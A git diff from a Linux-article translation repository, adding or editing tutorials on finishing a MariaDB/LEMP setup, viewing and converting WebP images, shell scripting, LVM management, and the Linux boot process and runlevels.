+![](http://www.tecmint.com/wp-content/uploads/2016/05/Secure-MariaDB-Installation-for-Nginx.png)
+>Secure MariaDB Installation for Nginx
+
+#### 17. To configure MariaDB so that ordinary users can access the database without system sudo privileges, go to the MySQL command-line interface with root privileges and run the below commands in the MySQL interpreter:
+
+```
+$ sudo mysql
+MariaDB> use mysql;
+MariaDB> update user set plugin='' where User='root';
+MariaDB> flush privileges;
+MariaDB> exit
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/MariaDB-User-Permissions.png)
+>MariaDB User Permissions
+
+Finally, log in to the MariaDB database and run an arbitrary command without sudo privileges by executing the below command:
+
+```
+$ mysql -u root -p -e 'show databases'
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Check-MariaDB-Databases.png)
+>Check MariaDB Databases
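+
+Emptying the authentication plugin for root is what this article suggests; a safer pattern (our assumption, with hypothetical user name and password) is to leave root untouched and create a dedicated administrative user instead:
+
+```
+MariaDB> GRANT ALL PRIVILEGES ON *.* TO 'admin'@'localhost' IDENTIFIED BY 'strong_password';
+MariaDB> FLUSH PRIVILEGES;
+```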
+
+That’s all! Now you have a **LEMP** stack configured on an **Ubuntu 16.04** server that allows you to deploy complex dynamic web applications that can interact with databases.
+
+--------------------------------------------------------------------------------
+
+via: http://www.tecmint.com/install-nginx-mariadb-php7-http2-on-ubuntu-16-04/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+tecmint+%28Tecmint%3A+Linux+Howto%27s+Guide%29
+
+作者:[Matei Cezar][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: http://www.tecmint.com/author/cezarmatei/
+[1]: http://www.tecmint.com/installation-of-ubuntu-16-04-server-edition/
+[2]: http://www.tecmint.com/apt-advanced-package-command-examples-in-ubuntu/
+[3]: http://www.tecmint.com/20-netstat-commands-for-linux-network-management/
+[4]: http://www.tecmint.com/manage-services-using-systemd-and-systemctl-in-linux/
+[5]: http://www.tecmint.com/install-wordpress-using-lamp-or-lemp-on-rhel-centos-fedora/
diff --git a/sources/tech/20160531 HOW TO USE WEBP IMAGES IN UBUNTU LINUX.md b/sources/tech/20160531 HOW TO USE WEBP IMAGES IN UBUNTU LINUX.md
new file mode 100644
index 0000000000..45cc53157e
--- /dev/null
+++ b/sources/tech/20160531 HOW TO USE WEBP IMAGES IN UBUNTU LINUX.md
@@ -0,0 +1,180 @@
+HOW TO USE WEBP IMAGES IN UBUNTU LINUX
+=========================================
+
+![](http://itsfoss.com/wp-content/uploads/2016/05/support-webp-ubuntu-linux.jpg)
+>Brief: This guide shows you how to view WebP images in Linux and how to convert WebP images to JPEG or PNG format.
+
+### WHAT IS WEBP?
+
+It’s been over five years since Google introduced [WebP file format][0] for images. WebP provides lossy and lossless compression and WebP compressed files are around 25% smaller in size when compared to JPEG compression, Google claims.
+
+Google aimed for WebP to become the new standard for images on the web, but I don’t see it happening. It’s been over five years and it’s still not adopted as a standard outside Google’s ecosystem. But as we know, Google is pushy about its technologies. A few months back Google changed all the images on Google Plus to WebP.
+
+If you download those images from Google Plus using Google Chrome, you’ll have WebP images, no matter whether you had uploaded PNG or JPEG. And that’s not the problem. The actual problem is when you try to open those files in Ubuntu using the default GNOME Image Viewer and you see this error:
+
+>**Could not find XYZ.webp**
+>**Unrecognized image file format**
+
+![](http://itsfoss.com/wp-content/uploads/2016/05/WebP-images-Ubuntu-Linux-1.png)
+>GNOME Image Viewer doesn’t support WebP images
+
+In this tutorial, we shall see
+
+- how to add WebP support in Linux
+- list of programs that support WebP images
+- how to convert WebP images to PNG or JPEG
+- how to download WebP images directly as PNG images
+
+### HOW TO VIEW WEBP IMAGES IN UBUNTU AND OTHER LINUX
+
+[GNOME Image Viewer][3], the default image viewer in many Linux distributions including Ubuntu, doesn’t support WebP images. There are no plugins available at present that could enable GNOME Image Viewer to add WebP support.
+
+This means that we simply cannot use GNOME Image Viewer to open WebP files in Linux. A better alternative is [gThumb][4] that supports WebP images by default.
+
+To install gThumb in Ubuntu and other Ubuntu based Linux distributions, use the command below:
+
+```
+sudo apt-get install gthumb
+```
+
+Once installed, you can simply right-click on the WebP image and select gThumb to open it. You should be able to see it now:
+
+![](http://itsfoss.com/wp-content/uploads/2016/05/WebP-images-Ubuntu-Linux-2.jpeg)
+>WebP image in gThumb
+
+### MAKE GTHUMB THE DEFAULT APPLICATION FOR WEBP IMAGES IN UBUNTU
+
+For Ubuntu beginners, if you’d like to make gThumb the default application for opening WebP files, just follow the steps below:
+
+#### Step 1: Right click on the WebP image and select Properties.
+
+![](http://itsfoss.com/wp-content/uploads/2016/05/WebP-images-Ubuntu-Linux-3.png)
+>Select Properties from Right Click menu
+
+#### Step 2: Go to Open With tab, select gThumb and click on Set as default.
+
+![](http://itsfoss.com/wp-content/uploads/2016/05/WebP-images-Ubuntu-Linux-4.png)
+>Make gThumb the default application for WebP images in Ubuntu
+
+### MAKE GTHUMB THE DEFAULT APPLICATION FOR ALL IMAGES
+
+gThumb has a lot more to offer than Image Viewer. For example, you can do simple editing, add color filters to images, etc. The filters are not as effective as in XnRetro, the dedicated tool for [adding Instagram like effects on Linux][5], but the basic filters are available.
+
+I liked gThumb a lot and decided to make it the default image viewer. If you also want to make gThumb the default application for all kinds of images in Ubuntu, follow the steps below:
+
+#### Step 1: Open System Settings
+
+![](http://itsfoss.com/wp-content/uploads/2014/04/System_Settings_ubuntu_1404.jpeg)
+
+#### Step 2: Go to Details.
+
+![](http://itsfoss.com/wp-content/uploads/2013/11/System_settings_Ubuntu_1.jpeg)
+
+#### Step 3: Select gThumb as the default applications for images here.
+
+![](http://itsfoss.com/wp-content/uploads/2016/05/WebP-images-Ubuntu-Linux-5.png)
+
+### ALTERNATIVE PROGRAMS TO OPEN WEBP FILES IN LINUX
+
+It is possible that you might not like gThumb. If that’s the case, you can choose one of the following applications to view WebP images in Linux:
+
+- [XnView][6] (Not open source)
+- GIMP with an unofficial WebP plugin that can be installed via this [PPA][7], which is available up to Ubuntu 15.10. I’ll cover this part in another article.
+- [Gwenview][8]
+
+### CONVERT WEBP IMAGES TO PNG AND JPEG IN LINUX
+
+There are two ways to convert WebP images in Linux:
+
+- Command line
+- GUI
+
+#### 1. USING COMMAND LINE TO CONVERT WEBP IMAGES IN LINUX
+
+You need to install WebP tools first. Open a terminal and use the following command:
+
+```
+sudo apt-get install webp
+```
+
+##### CONVERT JPEG/PNG TO WEBP
+
+We’ll use the cwebp command (does it mean compress to WebP?) to convert JPEG or PNG files to WebP. The command format is:
+
+```
+cwebp -q [image_quality] [JPEG/PNG_filename] -o [WebP_filename]
+```
+
+For example, you can use the following command:
+
+```
+cwebp -q 90 example.jpeg -o example.webp
+```
+
+##### CONVERT WEBP TO JPEG/PNG
+
+To convert WebP images to JPEG or PNG, we’ll use the dwebp command. The command format is:
+
+```
+dwebp [WebP_filename] -o [PNG_filename]
+```
+
+An example of this command could be:
+
+```
+dwebp example.webp -o example.png
+```
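+
+If you have a whole directory of WebP files to convert, a short shell loop around the same dwebp tool saves repeated typing (a minimal sketch, assuming the files sit in the current directory):
+
+```
+# Convert every .webp file in the current directory to .png
+for f in *.webp; do
+    dwebp "$f" -o "${f%.webp}.png"
+done
+```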
+
+#### 2. USING GUI TOOL TO CONVERT WEBP TO JPEG/PNG
+
+For this purpose, we will use XnConvert which is a free but not open source application. You can download the installer files from their website:
+
+[Download XnConvert][1]
+
+Note that XnConvert is a powerful tool that you can use for batch resizing images. However, in this tutorial, we shall only see how to convert a single WebP image to PNG/JPEG.
+
+Open XnConvert and select the input file:
+
+![](http://itsfoss.com/wp-content/uploads/2016/05/WebP-images-Ubuntu-Linux-6.jpeg)
+
+In the Output tab, select the output format you want it to be converted to. Once you have selected the output format, click on Convert.
+
+![](http://itsfoss.com/wp-content/uploads/2016/05/WebP-images-Ubuntu-Linux-7.jpeg)
+
+That’s all you need to do to convert WebP images to PNG, JPEG or any other image format of your choice.
+
+### DOWNLOAD WEBP IMAGES AS PNG DIRECTLY IN CHROME WEB BROWSER
+
+Perhaps you don’t like the WebP image format at all and you don’t want to install new software just to view WebP images in Linux. It will be a bigger pain if you have to convert the WebP file for future use.
+
+An easier and less painful way to deal with it is to install the Chrome extension Save Image as PNG. With this extension, you can simply right click on a WebP image and save it as PNG directly.
+
+![](http://itsfoss.com/wp-content/uploads/2016/05/WebP-images-Ubuntu-Linux-8.png)
+>Saving WebP image as PNG in Google Chrome
+
+[Get Save Image as PNG extension][2]
+
+### WHAT’S YOUR PICK?
+
+I hope this detailed tutorial helped you to get WebP support on Linux and helped you to convert WebP images. How do you handle WebP images in Linux? Which tool do you use? From the above described methods, which one did you like the most?
+
+
+----------------------
+via: http://itsfoss.com/webp-ubuntu-linux/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+ItsFoss+%28Its+FOSS%21+An+Open+Source+Blog%29
+
+作者:[Abhishek Prakash][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: http://itsfoss.com/author/abhishek/
+[0]: https://developers.google.com/speed/webp/
+[1]: http://www.xnview.com/en/xnconvert/#downloads
+[2]: https://chrome.google.com/webstore/detail/save-image-as-png/nkokmeaibnajheohncaamjggkanfbphi?utm_source=chrome-ntp-icon
+[3]: https://wiki.gnome.org/Apps/EyeOfGnome
+[4]: https://wiki.gnome.org/Apps/gthumb
+[5]: http://itsfoss.com/add-instagram-effects-xnretro-ubuntu-linux/
+[6]: http://www.xnview.com/en/xnviewmp/#downloads
+[7]: https://launchpad.net/~george-edison55/+archive/ubuntu/webp
+[8]: https://userbase.kde.org/Gwenview
diff --git a/sources/tech/LFCS/Part 10 - LFCS--Understanding and Learning Basic Shell Scripting and Linux Filesystem Troubleshooting.md b/sources/tech/LFCS/Part 10 - LFCS--Understanding and Learning Basic Shell Scripting and Linux Filesystem Troubleshooting.md
index 841d5c0625..199d65957e 100644
--- a/sources/tech/LFCS/Part 10 - LFCS--Understanding and Learning Basic Shell Scripting and Linux Filesystem Troubleshooting.md
+++ b/sources/tech/LFCS/Part 10 - LFCS--Understanding and Learning Basic Shell Scripting and Linux Filesystem Troubleshooting.md
@@ -1,51 +1,54 @@
-Being translated by hittlle......
-Part 10 - LFCS: Understanding & Learning Basic Shell Scripting and Linux Filesystem Troubleshooting
+LFCS 第十讲:学习简单的 Shell 脚本编程和文件系统故障排除
================================================================================
-The Linux Foundation launched the LFCS certification (Linux Foundation Certified Sysadmin), a brand new initiative whose purpose is to allow individuals everywhere (and anywhere) to get certified in basic to intermediate operational support for Linux systems, which includes supporting running systems and services, along with overall monitoring and analysis, plus smart decision-making when it comes to raising issues to upper support teams.
+Linux 基金会发起了 LFCS 认证(Linux Foundation Certified Sysadmin,Linux 基金会认证系统管理员),这是一个全新的认证体系,主要目标是让全世界任何人都有机会考取认证。认证内容涵盖 Linux 系统从初级到中级的运维支持,主要包括:运行中系统和服务的维护、全面监控和分析的能力,以及在需要向上级支持团队上报问题时的决策能力。
![Basic Shell Scripting and Filesystem Troubleshooting](http://www.tecmint.com/wp-content/uploads/2014/11/lfcs-Part-10.png)
-Linux Foundation Certified Sysadmin – Part 10
+LFCS 系列第十讲
-Check out the following video that guides you an introduction to the Linux Foundation Certification Program.
+请观看以下视频,其中介绍了 Linux 基金会认证项目。
注:youtube 视频
-
+
-This is the last article (Part 10) of the present 10-tutorial long series. In this article we will focus on basic shell scripting and troubleshooting Linux file systems. Both topics are required for the LFCS certification exam.
+本讲是系列教程中的第十讲,主要集中讲解简单的 Shell 脚本编程和文件系统故障排除。这两块内容都是 LFCS 认证中的必备考点。
-### Understanding Terminals and Shells ###
+### 理解终端 (Terminals) 和 Shell ###
-Let’s clarify a few concepts first.
+首先要澄清几个概念。
-- A shell is a program that takes commands and gives them to the operating system to be executed.
-- A terminal is a program that allows us as end users to interact with the shell. One example of a terminal is GNOME terminal, as shown in the below image.
+- Shell 是一个程序,它将命令传递给操作系统来执行。
+- Terminal 也是一个程序,作为最终用户,我们需要使用它与 Shell 来交互。比如,下边的图片是 GNOME Terminal。
![Gnome Terminal](http://www.tecmint.com/wp-content/uploads/2014/11/Gnome-Terminal.png)
Gnome Terminal
-When we first start a shell, it presents a command prompt (also known as the command line), which tells us that the shell is ready to start accepting commands from its standard input device, which is usually the keyboard.
+启动 Shell 之后,会呈现一个命令提示符 (也称为命令行) 提示我们 Shell 已经做好了准备,接受标准输入设备输入的命令,这个标准输入设备通常是键盘。
-You may want to refer to another article in this series ([Use Command to Create, Edit, and Manipulate files – Part 1][1]) to review some useful commands.
+你可以参考该系列文章的 [第一讲 使用命令创建、编辑和操作文件][1] 来温习一些常用的命令。
-Linux provides a range of options for shells, the following being the most common:
+Linux 提供了许多可供选用的 Shell,下面列出一些常用的:
**bash Shell**
-Bash stands for Bourne Again SHell and is the GNU Project’s default shell. It incorporates useful features from the Korn shell (ksh) and C shell (csh), offering several improvements at the same time. This is the default shell used by the distributions covered in the LFCS certification, and it is the shell that we will use in this tutorial.
+Bash 代表 Bourne Again Shell,它是 GNU 项目默认的 Shell。它借鉴了 Korn shell (ksh) 和 C shell (csh) 中有用的特性,并同时做了许多改进。它也是 LFCS 认证所涵盖的各个发行版中的默认 Shell,同时也是本系列教程将使用的 Shell。
**sh Shell**
-The Bourne SHell is the oldest shell and therefore has been the default shell of many UNIX-like operating systems for many years.
-ksh Shell
+Bourne Shell 是最古老的 shell,因此多年来一直是许多类 Unix 操作系统的默认 shell。
-The Korn SHell is a Unix shell which was developed by David Korn at Bell Labs in the early 1980s. It is backward-compatible with the Bourne shell and includes many features of the C shell.
+**ksh Shell**
-A shell script is nothing more and nothing less than a text file turned into an executable program that combines commands that are executed by the shell one after another.
+Korn SHell (ksh) 也是一个 Unix shell,是贝尔实验室 (Bell Labs) 的 David Korn 在 20 世纪 80 年代初开发的。它向后兼容 Bourne shell,并包含了 C shell 中的许多特性。
-### Basic Shell Scripting ###
+
+一个 shell 脚本其实就是一个转化为可执行程序的文本文件,其中组合了一条条由 shell 依次执行的命令。
+
+### 简单的 Shell 脚本编程 ###
As mentioned earlier, a shell script is born as a plain text file. Thus, can be created and edited using our preferred text editor. You may want to consider using vi/m (refer to [Usage of vi Editor – Part 2][2] of this series), which features syntax highlighting for your convenience.
@@ -291,7 +294,7 @@ If we’re only interested in finding out what’s wrong (without trying to fix
Depending on the error messages in the output of fsck, we will know whether we can try to solve the issue ourselves or escalate it to engineering teams to perform further checks on the hardware.
-### Summary ###
+### 总结 ###
We have arrived at the end of this 10-article series where have tried to cover the basic domain competencies required to pass the LFCS exam.
@@ -304,7 +307,7 @@ If you have any questions or comments, they are always welcome – so don’t he
via: http://www.tecmint.com/linux-basic-shell-scripting-and-linux-filesystem-troubleshooting/
作者:[Gabriel Cánepa][a]
-译者:[译者ID](https://github.com/译者ID)
+译者:[GHLandy](https://github.com/GHLandy)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
diff --git a/sources/tech/LFCS/Part 11 - How to Manage and Create LVM Using vgcreate, lvcreate and lvextend Commands.md b/sources/tech/LFCS/Part 11 - How to Manage and Create LVM Using vgcreate, lvcreate and lvextend Commands.md
new file mode 100644
index 0000000000..4d2a9d7a13
--- /dev/null
+++ b/sources/tech/LFCS/Part 11 - How to Manage and Create LVM Using vgcreate, lvcreate and lvextend Commands.md
@@ -0,0 +1,206 @@
+Part 11 - How to Manage and Create LVM Using vgcreate, lvcreate and lvextend Commands
+============================================================================================
+
+Because of the changes in the LFCS exam requirements effective Feb. 2, 2016, we are adding the necessary topics to the [LFCS series][1] published here. To prepare for this exam, you are highly encouraged to use the [LFCE series][2] as well.
+
+![](http://www.tecmint.com/wp-content/uploads/2016/03/Manage-LVM-and-Create-LVM-Partition-in-Linux.png)
+>LFCS: Manage LVM and Create LVM Partition – Part 11
+
+One of the most important decisions while installing a Linux system is the amount of storage space to be allocated for system files, home directories, and others. If you make a mistake at that point, growing a partition that has run out of space can be burdensome and somewhat risky.
+
+**Logical Volume Management** (also known as **LVM**), which has become a default for the installation of most (if not all) Linux distributions, has numerous advantages over traditional partitioning management. Perhaps the most distinguishing feature of LVM is that it allows logical divisions to be resized (reduced or increased) at will without much hassle.
+
+The structure of the LVM consists of:
+
+* One or more entire hard disks or partitions are configured as physical volumes (PVs).
+* A volume group (**VG**) is created using one or more physical volumes. You can think of a volume group as a single storage unit.
+* Multiple logical volumes can then be created in a volume group. Each logical volume is somewhat equivalent to a traditional partition – with the advantage that it can be resized at will as we mentioned earlier.
+
+In this article we will use three disks of **8 GB** each (**/dev/sdb**, **/dev/sdc**, and **/dev/sdd**) to create three physical volumes. You can either create the PVs directly on top of the device, or partition it first.
+
+Although we have chosen to go with the first method, if you decide to go with the second (as explained in [Part 4 – Create Partitions and File Systems in Linux][3] of this series) make sure to configure each partition as type `8e`.
+
+### Creating Physical Volumes, Volume Groups, and Logical Volumes
+
+To create physical volumes on top of **/dev/sdb**, **/dev/sdc**, and **/dev/sdd**, do:
+
+```
+# pvcreate /dev/sdb /dev/sdc /dev/sdd
+```
+
+You can list the newly created PVs with:
+
+```
+# pvs
+```
+
+and get detailed information about each PV with:
+
+```
+# pvdisplay /dev/sdX
+```
+
+(where **X** is b, c, or d)
+
+If you omit `/dev/sdX` as parameter, you will get information about all the PVs.
+
+To create a volume group named `vg00` using `/dev/sdb` and `/dev/sdc` (we will save `/dev/sdd` for later to illustrate the possibility of adding other devices to expand storage capacity when needed):
+
+```
+# vgcreate vg00 /dev/sdb /dev/sdc
+```
+
+As it was the case with physical volumes, you can also view information about this volume group by issuing:
+
+```
+# vgdisplay vg00
+```
+
+Since `vg00` is formed with two **8 GB** disks, it will appear as a single **16 GB** drive:
+
+![](http://www.tecmint.com/wp-content/uploads/2016/03/List-LVM-Volume-Groups.png)
+>List LVM Volume Groups
+
+When it comes to creating logical volumes, the distribution of space must take into consideration both current and future needs. It is considered good practice to name each logical volume according to its intended use.
+
+For example, let’s create two LVs named `vol_projects` (**10 GB**) and `vol_backups` (remaining space), which we can use later to store project documentation and system backups, respectively.
+
+The `-n` option is used to indicate a name for the LV, whereas `-L` sets a fixed size and `-l` (lowercase L) is used to indicate a percentage of the remaining space in the container VG.
+
+```
+# lvcreate -n vol_projects -L 10G vg00
+# lvcreate -n vol_backups -l 100%FREE vg00
+```
+
+As before, you can view the list of LVs and basic information with:
+
+```
+# lvs
+```
+
+and detailed information with
+
+```
+# lvdisplay
+```
+
+To view information about a single **LV**, use **lvdisplay** with the **VG** and **LV** as parameters, as follows:
+
+```
+# lvdisplay vg00/vol_projects
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/03/List-Logical-Volume.png)
+>List Logical Volume
+
+In the image above we can see that the LVs were created as storage devices (refer to the LV Path line). Before each logical volume can be used, we need to create a filesystem on top of it.
+
+We’ll use ext4 as an example here since it allows us both to increase and reduce the size of each LV (as opposed to xfs, which only allows increasing the size):
+
+```
+# mkfs.ext4 /dev/vg00/vol_projects
+# mkfs.ext4 /dev/vg00/vol_backups
+```
+
+In the next section we will explain how to resize logical volumes and add extra physical storage space when the need arises to do so.
+
+### Resizing Logical Volumes and Extending Volume Groups
+
+Now picture the following scenario. You are starting to run out of space in `vol_backups`, while you have plenty of space available in `vol_projects`. Due to the nature of LVM, we can easily reduce the size of the latter (by, say, **2.5 GB**) and allocate it to the former, resizing each filesystem at the same time.
+
+Fortunately, this is as easy as doing:
+
+```
+# lvreduce -L -2.5G -r /dev/vg00/vol_projects
+# lvextend -l +100%FREE -r /dev/vg00/vol_backups
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/03/Resize-Reduce-Logical-Volume-and-Volume-Group.png)
+>Resize Reduce Logical Volume and Volume Group
+
+It is important to include the minus `(-)` or plus `(+)` signs while resizing a logical volume. Otherwise, you’re setting a fixed size for the LV instead of resizing it.
+
+It can happen that you arrive at a point when resizing logical volumes cannot solve your storage needs anymore and you need to buy an extra storage device. Keeping it simple, you will need another disk. We are going to simulate this situation by adding the remaining PV from our initial setup (`/dev/sdd`).
+
+To add `/dev/sdd` to `vg00`, do
+
+```
+# vgextend vg00 /dev/sdd
+```
+
+If you run `vgdisplay vg00` before and after the previous command, you will see the increase in the size of the VG:
+
+```
+# vgdisplay vg00
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/03/List-Volume-Group-Size.png)
+>Check Volume Group Disk Size
+
+Now you can use the newly added space to resize the existing LVs according to your needs, or to create additional ones as needed.
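+
+For instance, you could extend `vol_backups` by a further 4 GB (resizing its filesystem at the same time with `-r`), or create and format an additional logical volume — a hedged sketch where the sizes and the LV name `vol_scratch` are hypothetical, not part of the original setup:
+
+```
+# lvextend -L +4G -r /dev/vg00/vol_backups
+# lvcreate -n vol_scratch -L 4G vg00
+# mkfs.ext4 /dev/vg00/vol_scratch
+```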
+
+### Mounting Logical Volumes on Boot and on Demand
+
+Of course there would be no point in creating logical volumes if we are not going to actually use them! To better identify a logical volume we will need to find out what its `UUID` (a non-changing attribute that uniquely identifies a formatted storage device) is.
+
+To do that, use blkid followed by the path to each device:
+
+```
+# blkid /dev/vg00/vol_projects
+# blkid /dev/vg00/vol_backups
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/03/Find-Logical-Volume-UUID.png)
+>Find Logical Volume UUID
+
+Create mount points for each LV:
+
+```
+# mkdir /home/projects
+# mkdir /home/backups
+```
+
+and insert the corresponding entries in `/etc/fstab` (make sure to use the UUIDs obtained before):
+
+```
+UUID=b85df913-580f-461c-844f-546d8cde4646 /home/projects ext4 defaults 0 0
+UUID=e1929239-5087-44b1-9396-53e09db6eb9e /home/backups ext4 defaults 0 0
+```
+
+Then save the changes and mount the LVs:
+
+```
+# mount -a
+# mount | grep home
+```
+
+
+When it comes to actually using the LVs, you will need to assign proper `ugo+rwx` permissions as explained in [Part 8 – Manage Users and Groups in Linux][4] of this series.
+
+### Summary
+
+In this article we have introduced [Logical Volume Management][5], a versatile tool to manage storage devices that provides scalability. When combined with RAID (which we explained in [Part 6 – Create and Manage RAID in Linux][6] of this series), you can enjoy not only scalability (provided by LVM) but also redundancy (offered by RAID).
+
+In this type of setup, you will typically find `LVM` on top of `RAID`, that is, configure RAID first and then configure LVM on top of it.
+
+If you have questions about this article, or suggestions to improve it, feel free to reach us using the comment form below.
+
+--------------------------------------------------------------------------------
+
+via: http://www.tecmint.com/linux-basic-shell-scripting-and-linux-filesystem-troubleshooting/
+
+作者:[Gabriel Cánepa][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: http://www.tecmint.com/author/gacanepa/
+[1]: http://www.tecmint.com/sed-command-to-create-edit-and-manipulate-files-in-linux/
+[2]: http://www.tecmint.com/installing-network-services-and-configuring-services-at-system-boot/
+[3]: http://www.tecmint.com/create-partitions-and-filesystems-in-linux/
+[4]: http://www.tecmint.com/manage-users-and-groups-in-linux/
+[5]: http://www.tecmint.com/create-lvm-storage-in-linux/
+[6]: http://www.tecmint.com/creating-and-managing-raid-backups-in-linux/
diff --git a/sources/tech/LFCS/Part 7 - LFCS--Managing System Startup Process and Services SysVinit Systemd and Upstart.md b/sources/tech/LFCS/Part 7 - LFCS--Managing System Startup Process and Services SysVinit Systemd and Upstart.md
deleted file mode 100644
index 3a2dfa844a..0000000000
--- a/sources/tech/LFCS/Part 7 - LFCS--Managing System Startup Process and Services SysVinit Systemd and Upstart.md
+++ /dev/null
@@ -1,369 +0,0 @@
-Translating by Flowsnow
-
-Part 7 - LFCS: Managing System Startup Process and Services (SysVinit, Systemd and Upstart)
-================================================================================
-A couple of months ago, the Linux Foundation announced the LFCS (Linux Foundation Certified Sysadmin) certification, an exciting new program whose aim is allowing individuals from all ends of the world to get certified in performing basic to intermediate system administration tasks on Linux systems. This includes supporting already running systems and services, along with first-hand problem-finding and analysis, plus the ability to decide when to raise issues to engineering teams.
-
-![Linux Foundation Certified Sysadmin – Part 7](http://www.tecmint.com/wp-content/uploads/2014/10/lfcs-Part-7.png)
-
-Linux Foundation Certified Sysadmin – Part 7
-
-The following video describes an brief introduction to The Linux Foundation Certification Program.
-
-注:youtube 视频
-
-
-This post is Part 7 of a 10-tutorial series, here in this part, we will explain how to Manage Linux System Startup Process and Services, that are required for the LFCS certification exam.
-
-### Managing the Linux Startup Process ###
-
-The boot process of a Linux system consists of several phases, each represented by a different component. The following diagram briefly summarizes the boot process and shows all the main components involved.
-
-![Linux Boot Process](http://www.tecmint.com/wp-content/uploads/2014/10/Linux-Boot-Process.png)
-
-Linux Boot Process
-
-When you press the Power button on your machine, the firmware that is stored in a EEPROM chip in the motherboard initializes the POST (Power-On Self Test) to check on the state of the system’s hardware resources. When the POST is finished, the firmware then searches and loads the 1st stage boot loader, located in the MBR or in the EFI partition of the first available disk, and gives control to it.
-
-#### MBR Method ####
-
-The MBR is located in the first sector of the disk marked as bootable in the BIOS settings and is 512 bytes in size.
-
-- First 446 bytes: The bootloader contains both executable code and error message text.
-- Next 64 bytes: The Partition table contains a record for each of four partitions (primary or extended). Among other things, each record indicates the status (active / not active), size, and start / end sectors of each partition.
-- Last 2 bytes: The magic number serves as a validation check of the MBR.
-
-The following command performs a backup of the MBR (in this example, /dev/sda is the first hard disk). The resulting file, mbr.bkp can come in handy should the partition table become corrupt, for example, rendering the system unbootable.
-
-Of course, in order to use it later if the need arises, we will need to save it and store it somewhere else (like a USB drive, for example). That file will help us restore the MBR and will get us going once again if and only if we do not change the hard drive layout in the meanwhile.
-
-**Backup MBR**
-
- # dd if=/dev/sda of=mbr.bkp bs=512 count=1
-
-![Backup MBR in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Backup-MBR-in-Linux.png)
-
-Backup MBR in Linux
-
-**Restoring MBR**
-
- # dd if=mbr.bkp of=/dev/sda bs=512 count=1
-
-![Restore MBR in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Restore-MBR-in-Linux.png)
-
-Restore MBR in Linux
-
-#### EFI/UEFI Method ####
-
-For systems using the EFI/UEFI method, the UEFI firmware reads its settings to determine which UEFI application is to be launched and from where (i.e., in which disk and partition the EFI partition is located).
-
-Next, the 2nd stage boot loader (aka boot manager) is loaded and run. GRUB [GRand Unified Boot] is the most frequently used boot manager in Linux. One of two distinct versions can be found on most systems used today.
-
-- GRUB legacy configuration file: /boot/grub/menu.lst (older distributions, not supported by EFI/UEFI firmwares).
-- GRUB2 configuration file: most likely, /etc/default/grub.
-
-Although the objectives of the LFCS exam do not explicitly request knowledge about GRUB internals, if you’re brave and can afford to mess up your system (you may want to try it first on a virtual machine, just in case), you need to run.
-
- # update-grub
-
-As root after modifying GRUB’s configuration in order to apply the changes.
-
-Basically, GRUB loads the default kernel and the initrd or initramfs image. In few words, initrd or initramfs help to perform the hardware detection, the kernel module loading and the device discovery necessary to get the real root filesystem mounted.
-
-Once the real root filesystem is up, the kernel executes the system and service manager (init or systemd, whose process identification or PID is always 1) to begin the normal user-space boot process in order to present a user interface.
-
-Both init and systemd are daemons (background processes) that manage other daemons, as the first service to start (during boot) and the last service to terminate (during shutdown).
-
-![Systemd and Init](http://www.tecmint.com/wp-content/uploads/2014/10/systemd-and-init.png)
-
-Systemd and Init
-
-### Starting Services (SysVinit) ###
-
-The concept of runlevels in Linux specifies different ways to use a system by controlling which services are running. In other words, a runlevel controls what tasks can be accomplished in the current execution state = runlevel (and which ones cannot).
-
-Traditionally, this startup process was performed based on conventions that originated with System V UNIX, with the system passing executing collections of scripts that start and stop services as the machine entered a specific runlevel (which, in other words, is a different mode of running the system).
-
-Within each runlevel, individual services can be set to run, or to be shut down if running. Latest versions of some major distributions are moving away from the System V standard in favour of a rather new service and system manager called systemd (which stands for system daemon), but usually support sysv commands for compatibility purposes. This means that you can run most of the well-known sysv init tools in a systemd-based distribution.
-
-- Read Also: [Why ‘systemd’ replaces ‘init’ in Linux][1]
-
-Besides starting the system process, init looks to the /etc/inittab file to decide what runlevel must be entered.
-
-注:表格
-
-
-
-
-
-
-
-
Runlevel
-
Description
-
-
-
0
-
Halt the system. Runlevel 0 is a special transitional state used to shutdown the system quickly.
-
-
-
1
-
Also aliased to s, or S, this runlevel is sometimes called maintenance mode. What services, if any, are started at this runlevel varies by distribution. It’s typically used for low-level system maintenance that may be impaired by normal system operation.
-
-
-
2
-
Multiuser. On Debian systems and derivatives, this is the default runlevel, and includes -if available- a graphical login. On Red-Hat based systems, this is multiuser mode without networking.
-
-
-
3
-
On Red-Hat based systems, this is the default multiuser mode, which runs everything except the graphical environment. This runlevel and levels 4 and 5 usually are not used on Debian-based systems.
-
-
-
4
-
Typically unused by default and therefore available for customization.
-
-
-
5
-
On Red-Hat based systems, full multiuser mode with GUI login. This runlevel is like level 3, but with a GUI login available.
-
-
-
6
-
Reboot the system.
-
-
-
-
-To switch between runlevels, we can simply issue a runlevel change using the init command: init N (where N is one of the runlevels listed above). Please note that this is not the recommended way of taking a running system to a different runlevel because it gives no warning to existing logged-in users (thus causing them to lose work and processes to terminate abnormally).
-
-Instead, the shutdown command should be used to restart the system (which first sends a warning message to all logged-in users and blocks any further logins; it then signals init to switch runlevels); however, the default runlevel (the one the system will boot to) must be edited in the /etc/inittab file first.
-
